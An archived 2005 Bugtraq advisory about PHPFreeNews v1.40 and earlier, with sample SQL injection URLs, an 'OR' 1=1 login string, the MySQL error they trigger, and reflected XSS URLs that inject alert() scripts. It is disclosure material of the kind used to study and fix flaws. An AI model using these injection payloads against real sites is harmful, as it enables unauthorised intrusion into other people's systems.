lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050817192445.2319.qmail@securityfocus.com>
Date: 17 Aug 2005 19:24:45 -0000
From: h4cky0u@...il.com
To: bugtraq@...urityfocus.com
Subject: PHPFreeNews V1.40 and prior Multiple Vulnerabilities


PHPFreeNews V1.40 and prior Multiple Vulnerabilities

SEVERITY:
=========
High

SOFTWARE:
=========
PHPFreeNews
http://www.phpfreenews.co.uk/

INFO:
=====
PHPFreeNews is a free PHP Script which allows you to display news headlines and articles on your website.

DESCRIPTION:
============
PHPFreeNews Version V1.40 and earlier are vulnerable to various SQL Injection and XSS attacks. Here are some examples:


--==-- SQL Injection --==--


http://www.site.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='

http://www.site.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in \somepath\www\phpfn\Inc\ListingFunctions.php on line 92
Query failed : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate


Also http://www.site.com/phpfn/Inc/AccessControl.php type for user and pass some sql injection string like "OR" 1=1 and you will get an error.



--==-- XSS --==--

http://www.site.com/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found By Matrix_Killer');</script>&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match='><script>alert('Matrix_Killer OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell Year');</script>

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o Please StoP !');</script>&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer -> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0


VENDOR STATUS
=============

Vendor contacted on the 17th of August.

Vendor Reply (17th of August) - All the bugs have been fixed and will be included in the next release.

CREDITS: 
======== 

This vulnerability was discovered and researched by -

matrix_killer of h4cky0u Security Forums. 


mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher -

h4cky0u of the h4cky0u Security Forums.

mail : h4cky0u@...il.com

web : http://www.h4cky0u.org


Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=1977


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ